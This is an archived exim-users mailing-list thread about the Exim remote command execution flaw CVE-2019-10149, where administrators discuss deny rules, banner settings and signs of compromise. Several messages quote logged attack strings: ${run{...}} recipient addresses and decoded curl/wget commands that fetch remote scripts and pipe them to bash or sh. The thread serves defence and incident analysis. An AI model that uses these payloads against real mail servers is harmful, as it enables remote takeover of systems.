Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-05 Thread Jeremy Harris via Exim-users
On 04/07/2019 21:23, Ian Zimmerman via Exim-users wrote:
> After your important discovery that escaping is done on local parts as
> part of SMTP (at least that's how I interpreted the disappearance of the
> backslash from "it\z"), the next question should be but has not yet
> been:  why is this needed at all?

Because Exim's string-escaping lets you write a dollar-sign as \x24.
So we need to get a matcher for that into the RE.

>  Won't the whole escape sequence be
> transformed into a dollar sign by the time it is matched against the
> rule?

No; the SMTP string-escaping does not provide that facility.
So an attacker can fairly simply get somthing into a local-part
which ends up as a \x24 after the SMTP de-escaping.

-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-05 Thread Cyborg via Exim-users
Am 05.07.19 um 06:26 schrieb Jasen Betts via Exim-users:
>
> It looks to me like it matches any string, it should probably be ^.*\$
> which would match any astring contailnin literal '$'
It's a crude, brutal protection rule against a root exploit, of course
it shall block *any* $ in that string :)

>> ^.\\x24 does the same?
> matches containing literal '\x24'
>
>> but I'm stymied about the \\0.44 notation, what's that?
> assuming typo: \\0?44 matches strings containing literal '\044' and '\44'
>

octal version of \x24 aka $ .


Guys, the rules are made to even protect against "new" "inventive" forms
for encoding attacks
for a handfull of servers not capable of updating, taking into account,
that some none harmfull strings are also matched.

They are not meant for upgraded production servers, as they are not
needed there.

The MOTD is "better be safe, than sorry" .

If you wanne make the rules better, easier, smarter, please do so, but
you are wasting time and resources you should use to upgrade your
installations.

best regrads,
Marius
-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-04 Thread Jasen Betts via Exim-users
On 2019-07-03, Marc Haber via Exim-users  wrote:
> On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users
> wrote:
>>  deny  local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
>>message = no mate
>
> This might be a really stupid question, but what exactly does that do?
>
> ^.*$ blocks local_parts containing a $

It looks to me like it matches any string, it should probably be ^.*\$
which would match any astring contailnin literal '$'

> ^.\\x24 does the same?

matches containing literal '\x24'

> but I'm stymied about the \\0.44 notation, what's that?

assuming typo: \\0?44 matches strings containing literal '\044' and '\44'

-- 
  When I tried casting out nines I made a hash of it.

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-04 Thread Ian Zimmerman via Exim-users
On 2019-07-03 21:42, Jeremy Harris wrote:

> > \\x24 should match the literal \x24, which may be used to encode the
> > dollar sign for the unintended local_part expansion in the vulnerable
> > code.

After your important discovery that escaping is done on local parts as
part of SMTP (at least that's how I interpreted the disappearance of the
backslash from "it\z"), the next question should be but has not yet
been:  why is this needed at all?  Won't the whole escape sequence be
transformed into a dollar sign by the time it is matched against the
rule?

-- 
Please don't Cc: me privately on mailing lists and Usenet,
if you also post the followup to the list or newsgroup.
To reply privately _only_ on Usenet and on broken lists
which rewrite From, fetch the TXT record for no-use.mooo.com.

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-03 Thread Jeremy Harris via Exim-users
On 03/07/2019 20:02, Heiko Schlittermann via Exim-users wrote:
> Marc Haber via Exim-users  (Mi 03 Jul 2019 18:17:24 
> CEST):
>> On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users
>>  wrote:
>>>  deny  local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
>>>message = no mate
>>
>> This might be a really stupid question, but what exactly does that do?
>>
>> ^.*$ blocks local_parts containing a $
>> ^.\\x24 does the same?
>> but I'm stymied about the \\0.44 notation, what's that?
> 
> From my POV ^.*$ matches *any* local_part, as $ is the string's end anchor, 
> isn't it?.
> But I can't imagine that such mistake happens to Jeremy, so I assume, I'm 
> missing the point here.

You're not missing the point at all; I made a foolish error.
That should have been   ^.*\$   - to get any local_part containing
a dollar.

> \\x24 should match the literal \x24, which may be used to encode the
> dollar sign for the unintended local_part expansion in the vulnerable
> code.
> 
> \\044 and \\44 may encode the dollar sign in base8 notation, with and
> w/o the leading zero. Both are collapsed into \\0?44

Yes.  But (MH) note there is a question-mark there, not a period.

-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-03 Thread Heiko Schlittermann via Exim-users
Marc Haber via Exim-users  (Mi 03 Jul 2019 18:17:24 CEST):
> On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users
>  wrote:
> >  deny  local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
> >message = no mate
>
> This might be a really stupid question, but what exactly does that do?
>
> ^.*$ blocks local_parts containing a $
> ^.\\x24 does the same?
> but I'm stymied about the \\0.44 notation, what's that?

From my POV ^.*$ matches *any* local_part, as $ is the string's end anchor, 
isn't it?.
But I can't imagine that such mistake happens to Jeremy, so I assume, I'm 
missing the point here.

\\x24 should match the literal \x24, which may be used to encode the
dollar sign for the unintended local_part expansion in the vulnerable
code.

\\044 and \\44 may encode the dollar sign in base8 notation, with and
w/o the leading zero. Both are collapsed into \\0?44

But I may be totally wrong here.

--
Heiko


signature.asc
Description: PGP signature
-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-03 Thread Marc Haber via Exim-users
On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users
 wrote:
>  deny  local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
>message = no mate

This might be a really stupid question, but what exactly does that do?

^.*$ blocks local_parts containing a $
^.\\x24 does the same?
but I'm stymied about the \\0.44 notation, what's that?

Greetings
Marc
-- 
-- !! No courtesy copies, please !! -
Marc Haber |   " Questions are the | Mailadresse im Header
Mannheim, Germany  | Beginning of Wisdom " | 
Nordisch by Nature | Lt. Worf, TNG "Rightful Heir" | Fon: *49 621 72739834

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Jeremy Harris via Exim-users
On 25/06/2019 19:01, mixed8e--- via Exim-users wrote:
>> and i was not sure if EXIM does publish that string in any other possible
>> remote "access vector" too.
> 
> That would be nice to know.

A scan over the source gives me:

- logged at daemon startup & shutdown
- written to the process log on SIGUSR1
- included in debug, "-bP config" & "-bV" output
- the default Received: header text
- the default banner text

Only the last two are remotely accessible; all are locally acessible

-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Calum Mackay via Exim-users

inline…

On 24/06/2019 7:18 pm, mixed8e--- via Exim-users wrote:

On Fri, 2019-06-21 at 15:53 +0200, Heiko Schlittermann via Exim-users
wrote:

Check your system for unusual activities.
Symptoms on a hacked system I got aware of were quite similar. The
log
reported about too many received headers:

root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
2019-06-20 15:13:33 Received from <> H=(.de)
[89.248.171.57] P=smtp S=1114
2019-06-20 15:13:33 routing failed for
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec
k\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\
x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x
20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@.de: Too many "Received" headers - suspected mail loop
*** Frozen (delivery error message)

Checked my mail server today as well and found 46 frozen mails and
plenty of the same log messages. All of the mails were sent from a
single IP: 89.248.171.57 (scanner20.openportstats.com) and apparently
are sent every 3 hours.

As far as I can tell nothing was changed on the server though. Files
are fine, cron entries are standard and no cryptominer is running (CPU
utilization is low).


I got to see this on a server where the attack was successful. The code
executed by the wget in the ${run...} command downloaded this script:

https://pastebin.com/c3LKPEDU

It tries to maintain infection by inserting several cron changes and copy
itself in several places around the file system.

On another machine it looks like I saw a different attack, but I don't
know enough about Exim.  There are a large number of files in /root (Exim
is being run as root on this server) that have names like:

86NoHEg
DBaH23d
f8fam2O
Cg8E4NM

Those files are all binary, but the dates on them confuse me: there are a
group from June 15, June 16, then there is a group from May 20 which is
before the exploit was announced.


It doesn't look related to the attack I saw.

but check the inode change time (ctime), with e.g "ls -lc". In the 
attack I saw, there were various faked mtimes, including old ones, but 
the ctimes were the day of the attack.


cheers,
calum.

 Perhaps this is unrelated? There are no

cron job entries that try to execute these files. I'm not sure what to
make of them.

Help?





--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Heiko Schlittermann via Exim-users
Niels Dettenbach via Exim-users  (Di 25 Jun 2019 14:48:20 
CEST):
> Am Dienstag, 25. Juni 2019, 13:53:26 CEST schrieb Jeremy Harris via Exim-
> users:
> > No recompile needed.  smtp_banner.
> This only set's the banner, but not the SMTP-Headers " by " which are
> "public" too and used as a idicator for "security researchers" (by my
> experience) - i.e. germany BSI.

Starting with the next version (4.93) we have "exim_version" main
option.

++
|exim_version|Use: main|Type: string|Default: current version|
++

This option allows to override the $version_number/$exim_version Exim 
reports
in various places. Use with care, this may fool stupid security scanners.


Best regards from Dresden/Germany
Viele Grüße aus Dresden
Heiko Schlittermann
--
 SCHLITTERMANN.de  internet & unix support -
 Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
 gnupg encrypted messages are welcome --- key ID: F69376CE -
 ! key id 7CBF764A and 972EAC9F are revoked since 2015-01  -


signature.asc
Description: PGP signature
-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Niels Dettenbach via Exim-users
Am Dienstag, 25. Juni 2019, 15:03:02 CEST schrieb Jeremy Harris via Exim-
users:
> Indeed; but only the banner was being asked about.
ok, sorry for the noise. for me, the the Recvd header is a kind of "banner" 
too. seems a misunderstanding from my side.

> You're interested in received_header_text, I suspect.
possible too - but easy to "break" any less known rfcs or "expected 
practices" without a proven "default" and so deeper experience about that - 
and i was not sure if EXIM does publish that string in any other possible 
remote "access vector" too.
 

-- 
 ---
 Niels Dettenbach
 Syndicat IT & Internet
 http://www.syndicat.com
 PGP: https://syndicat.com/pub_key.asc
 ---
 





signature.asc
Description: This is a digitally signed message part.
-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Jeremy Harris via Exim-users
On 25/06/2019 13:48, Niels Dettenbach via Exim-users wrote:
> Am Dienstag, 25. Juni 2019, 13:53:26 CEST schrieb Jeremy Harris via Exim-
> users:
>> No recompile needed.  smtp_banner.
> This only set's the banner, but not the SMTP-Headers " by " which are 
> "public" too and used as a idicator for "security researchers" (by my 
> experience) - i.e. germany BSI.

Indeed; but only the banner was being asked about.
You're interested in received_header_text, I suspect.

PS:  I do not need an additional copy of list emails.  I get
 very tired of getting them.  If your MUA does not have
 a "reply to list" button, please get a better one.
 I swear, I'm going to start deliberately ignoring anyone
 who sends me a useless copy, real soon now.

-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Niels Dettenbach via Exim-users
Am Dienstag, 25. Juni 2019, 13:53:26 CEST schrieb Jeremy Harris via Exim-
users:
> No recompile needed.  smtp_banner.
This only set's the banner, but not the SMTP-Headers " by " which are 
"public" too and used as a idicator for "security researchers" (by my 
experience) - i.e. germany BSI.

hth,


niels.
-- 
 ---
 Niels Dettenbach
 Syndicat IT & Internet
 http://www.syndicat.com
 PGP: https://syndicat.com/pub_key.asc
 ---
 





signature.asc
Description: This is a digitally signed message part.
-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Wolfgang Breyha via Exim-users
mixed8e--- via Exim-users wrote on 24/06/2019 20:02:
> Dumb question, what is the config setting that allows me to remove the
> Exim version from the greet banner?

https://www.exim.org/exim-html-current/doc/html/spec_html/ch-main_configuration.html
search for smtp_banner

Greetings, Wolfgang
--
Wolfgang Breyha  | https://www.blafasel.at/
Vienna University Computer Center | Austria


-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Jeremy Harris via Exim-users
On 25/06/2019 12:41, Niels Dettenbach via Exim-users wrote:
> Am Montag, 24. Juni 2019, 20:02:33 CEST schrieb mixed8e--- via Exim-users:
>> Dumb question, what is the config setting that allows me to remove the
>> Exim version from the greet banner?
> If i remember right, there is no such option in the config file

No recompile needed.  smtp_banner.

-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Jeremy Harris via Exim-users
On 24/06/2019 19:18, mixed8e--- via Exim-users wrote:
> a group from May 20 which is
> before the exploit was announced. Perhaps this is unrelated? There are no
> cron job entries that try to execute these files. I'm not sure what to
> make of them.

Perhaps your system was already compromised by other means.
I'd suggest a reinstall.

-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-24 Thread Jeremy Harris via Exim-users
On 24/06/2019 18:55, Ian Zimmerman via Exim-users wrote:
> I think this is a bug, do you agree?

Yes.  Looking into that.

-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-24 Thread Jeremy Harris via Exim-users
On 24/06/2019 18:55, Ian Zimmerman via Exim-users wrote:
> RCPT TO:
> 
> the local part being tested, according to the >>> output, is just "itz",
> which of course ends up being accepted.
> 
> I think this is a bug, do you agree?

This turns out to be deliberate, with the following code comment:

/* The implication in the RFCs (though I can't say I've seen it spelled out
explicitly) is that quoting should be removed from local parts at the point
where they are locally interpreted. [The new draft "821" is more explicit on
this, Jan 1999.] We know the syntax is valid, so this can be done by simply
removing quoting backslashes and any unquoted doublequotes. */

( function "deliver_split_address" )

So, to get a backslash into a local-part you have to double it in the SMTP
RCPT line:

  RCPT TO:

-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-24 Thread Cyborg via Exim-users
Am 24.06.19 um 19:55 schrieb Ian Zimmerman via Exim-users:
> On 2019-06-24 17:23, Jeremy Harris wrote:
> For instance, if I say this in the -bh dialog:
>
> RCPT TO:
>
> the local part being tested, according to the >>> output, is just "itz",
> which of course ends up being accepted.
>
> I think this is a bug, do you agree?
>
try a real Escape Sequence like \x instead, as \z is no valid escape
sequence. Exim may remove those as "bugs in your regex" before
processsing it.

best regards,
Marius



-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-24 Thread Ian Zimmerman via Exim-users
On 2019-06-24 17:23, Jeremy Harris wrote:

> > I just want to prohibit any backslashes in local parts.  I know this is
> > totally safe to do im my case.  So what it the appropriate number of
> > backslashes to put in the regexp?  Will this work:
> > 
> > deny message = Restricted characters in address
> >  domains = +local_domains
> >  local_parts = ^[.] : ^.*[\$@%!/\\|]
> 
> I suggest quoting the entire list with \N for sanity.
> Having done that I think you need a double backslash.  I did when I
> tested it.  I suggest you test it yourself, using -bh.

So I tried that.  Unfortunately, it seems that some part of Exim eats
the backslashes before they are seen by the ACL.  I don't know if this
happens only in -bh mode or if it would happen with a running daemon
too.  I'm not trying the latter ATM.

For instance, if I say this in the -bh dialog:

RCPT TO:

the local part being tested, according to the >>> output, is just "itz",
which of course ends up being accepted.

I think this is a bug, do you agree?

-- 
Please don't Cc: me privately on mailing lists and Usenet,
if you also post the followup to the list or newsgroup.
To reply privately _only_ on Usenet and on broken lists
which rewrite From, fetch the TXT record for no-use.mooo.com.

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Calum Mackay via Exim-users
Best I have so far is adding '$' to the the trailing case in the Debian 
default list of bad chars in local parts of local addresses:


CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[@%!/|`#&?] : ^.*\\\$

which gets used here:

  deny
domains = +local_domains
local_parts = CHECK_RCPT_LOCAL_LOCALPARTS
message = restricted characters in address


I had to use '\\\$', rather than adding '$' to the existing [] block, 
due to both string expansion and '$' having a special meaning to PCRE.



that seems to work, at least.


This won't affect sender addresses with the exploit attempt, but those 
will just get delivered (assuming the recipient is good, with no frozen 
queue msgs.


And it won't help for relaying attempts (where a '$' might in theory be 
valid), but my server should stop those before they get to the queue.


Of course, this also required the patched exim to ensure the exploit 
doesn't actually work (with the sender address).



comments?

cheers,
calum.


On 23/06/2019 6:51 pm, Calum Mackay via Exim-users wrote:

On 22/06/2019 9:44 am, Andreas Metzler via Exim-users wrote:

CVE-2019-10149 is not that it is possible to submit a mail that ends
up frozen in the queue. CVE is a remote command execution
vulnerabilty. The fix for CVE-2019-10149 does not remove the
possibility to generate frozen mails in the queue, it stops the remote
command execution.


by any chance, please, would anyone happen to have an acl_smtp_rcpt 
example that catches these particular exploit attempts — so my queue 
doesn't fill up with these frozen msgs — /but/ still allows me to have 
"user+suffix@domain" which I enable via local_part_suffix on a redirect 
router?


i.e. just rejecting '+' in the local part is too strict, here.


thanks very much indeed.

cheers,
calum.



--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Evgeniy Berdnikov via Exim-users
On Sun, Jun 23, 2019 at 07:37:37PM +0200, Heiko Schlittermann via Exim-users 
wrote:
> It *seems* that the attackers test for the Exim version in the SMTP
> banner. In servers having 4.92 I do not see as many attempts as on
> 4.87->4.91. But there may be other things influencing this.

 I have 4 external relays for my company with custom greeting message
 which has no word "Exim" and no version. No breaking attempts logged
 up to 16.06.2019, since this date logs have records about probes
 with prefix "root+": .
-- 
 Eugene Berdnikov

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Calum Mackay via Exim-users

or, indeed just \$ within the []:

CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[\$@%!/|`#&?]

and I've belatedly noticed that this has already been posted by Marius, 
sorry!


Apologies for the noise.

cheers,
calum.

On 23/06/2019 7:57 pm, Calum Mackay wrote:
Best I have so far is adding '$' to the the trailing case in the Debian 
default list of bad chars in local parts of local addresses:


CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[@%!/|`#&?] : ^.*\\\$

which gets used here:

   deny
     domains = +local_domains
     local_parts = CHECK_RCPT_LOCAL_LOCALPARTS
     message = restricted characters in address


I had to use '\\\$', rather than adding '$' to the existing [] block, 
due to both string expansion and '$' having a special meaning to PCRE.



that seems to work, at least.


This won't affect sender addresses with the exploit attempt, but those 
will just get delivered (assuming the recipient is good, with no frozen 
queue msgs.


And it won't help for relaying attempts (where a '$' might in theory be 
valid), but my server should stop those before they get to the queue.


Of course, this also required the patched exim to ensure the exploit 
doesn't actually work (with the sender address).



comments?

cheers,
calum.


On 23/06/2019 6:51 pm, Calum Mackay via Exim-users wrote:

On 22/06/2019 9:44 am, Andreas Metzler via Exim-users wrote:

CVE-2019-10149 is not that it is possible to submit a mail that ends
up frozen in the queue. CVE is a remote command execution
vulnerabilty. The fix for CVE-2019-10149 does not remove the
possibility to generate frozen mails in the queue, it stops the remote
command execution.


by any chance, please, would anyone happen to have an acl_smtp_rcpt 
example that catches these particular exploit attempts — so my queue 
doesn't fill up with these frozen msgs — /but/ still allows me to have 
"user+suffix@domain" which I enable via local_part_suffix on a 
redirect router?


i.e. just rejecting '+' in the local part is too strict, here.


thanks very much indeed.

cheers,
calum.



--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Jeremy Harris via Exim-users
On 23/06/2019 18:51, Calum Mackay via Exim-users wrote:
> by any chance, please, would anyone happen to have an acl_smtp_rcpt
> example that catches these particular exploit attempts — so my queue
> doesn't fill up with these frozen msgs — /but/ still allows me to have
> "user+suffix@domain" which I enable via local_part_suffix on a redirect
> router?

  deny  local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
message = no mate

Thie is perhaps over-broad - a dollar sign in a local-part
is strictly legitimate per the standards.  However, it's
not something most strictly-Ascii sites would be wanting to
use, I suspect.
-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Calum Mackay via Exim-users

On 22/06/2019 9:44 am, Andreas Metzler via Exim-users wrote:

CVE-2019-10149 is not that it is possible to submit a mail that ends
up frozen in the queue. CVE is a remote command execution
vulnerabilty. The fix for CVE-2019-10149 does not remove the
possibility to generate frozen mails in the queue, it stops the remote
command execution.


by any chance, please, would anyone happen to have an acl_smtp_rcpt 
example that catches these particular exploit attempts — so my queue 
doesn't fill up with these frozen msgs — /but/ still allows me to have 
"user+suffix@domain" which I enable via local_part_suffix on a redirect 
router?


i.e. just rejecting '+' in the local part is too strict, here.


thanks very much indeed.

cheers,
calum.

--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Heiko Schlittermann via Exim-users
Hello,

Thomas Hager via Exim-users  (Fr 21 Jun 2019 21:26:11 
CEST):
> > 2019-06-20 15:13:33 Received from <> H=(.de)
> > [89.248.171.57] P=smtp S=1114
> > 2019-06-20 15:13:33 routing failed for
> > root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec
> > k\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\
> > x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x
> > 20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@ > sored>.de: Too many "Received" headers - suspected mail loop

As Andreas M pointed out, the logs are the same, independently of an
successfull attack. (Though a wise attacker would remove the log lines.)

It *seems* that the attackers test for the Exim version in the SMTP
banner. In servers having 4.92 I do not see as many attempts as on
4.87->4.91. But there may be other things influencing this.

Best regards from Dresden/Germany
Viele Grüße aus Dresden
Heiko Schlittermann
--
 SCHLITTERMANN.de  internet & unix support -
 Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
 gnupg encrypted messages are welcome --- key ID: F69376CE -
 ! key id 7CBF764A and 972EAC9F are revoked since 2015-01  -


signature.asc
Description: PGP signature
-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-22 Thread Thomas Hager via Exim-users



On June 22, 2019 10:44:43 AM GMT+02:00, Andreas Metzler via Exim-users 
 wrote:
>Hello
Hi Andreas,

>the log-files on a try to exploit CVE-2019-10149 will look exactly the
>same
>for a vulnerable and for a fixed exim.
>
>CVE-2019-10149 is not that it is possible to submit a mail that ends
>up frozen in the queue. CVE is a remote command execution
>vulnerabilty. The fix for CVE-2019-10149 does not remove the
>possibility to generate frozen mails in the queue, it stops the remote
>command execution.
Thanks for the clarification. I thought so, but it's way better to know ;-)

Cheers,
Tom.

-- 
Sent from my Android device with K-9 Mail. Please excuse my brevity.

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-21 Thread Cyborg via Exim-users
Am 21.06.19 um 16:29 schrieb Benoît PELISSIER via Exim-users:
>> root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
>> 2019-06-20 15:13:33 Received from <> H=(.de)
>> [89.248.171.57] P=smtp S=1114
>> 2019-06-20 15:13:33 routing failed for
>> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@.de:
>> Too many "Received" headers - suspected mail loop
>> *** Frozen (delivery error message)
>
> I have this log entry too...
>

Does not look good for you to be honest.

Best regards,
Marius

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-21 Thread Benoît PELISSIER via Exim-users

The version is fine.
But the question is, when did you install this version?


When debian update his repo


Check your system for unusual activities.
Symptoms on a hacked system I got aware of were quite similar. The log
reported about too many received headers:

root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
2019-06-20 15:13:33 Received from <> H=(.de) [89.248.171.57] P=smtp 
S=1114
2019-06-20 15:13:33 routing failed for 
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@.de:
 Too many "Received" headers - suspected mail loop
*** Frozen (delivery error message)


I have this log entry too...

Benoît
<>-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-21 Thread Drav Sloan via Exim-users
Benoît PELISSIER via Exim-users wrote:
> ${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22}}@localhost

$ perl -e 'print
"\x2Fbin\x2Fsh\t-c\t\x22curl\x20https\x3a\x2F\x2Fpastebin.com\x2Fraw\x2FDj3JTtnj\x20-o\x20\x2Ftmp\x2Fbaby\x22\n";'
/bin/sh -c  "curl https://pastebin.com/raw/Dj3JTtnj -o /tmp/baby"

then:

$ wget --quiet -O - https://pastebin.com/raw/Dj3JTtnj && echo

nohup bash -c '(curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q
-O- hhttps://pastebin.com/raw/EzqVke6X)|bash' >/dev/null 2>&1 &
rm -rf /tmp/baby*

$ wget --quiet -O -  https://pastebin.com/raw/EzqVke6X && echo
(curl -fsSL https://pastebin.com/raw/yVAeeKTB||wget -q -O -
https://pastebin.com/raw/yVAeeKTB)| base64 -d |bash

Which yeilds the content I've pasted at:

https://pastebin.com/Gzi4cvc8

Regards

D.


-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
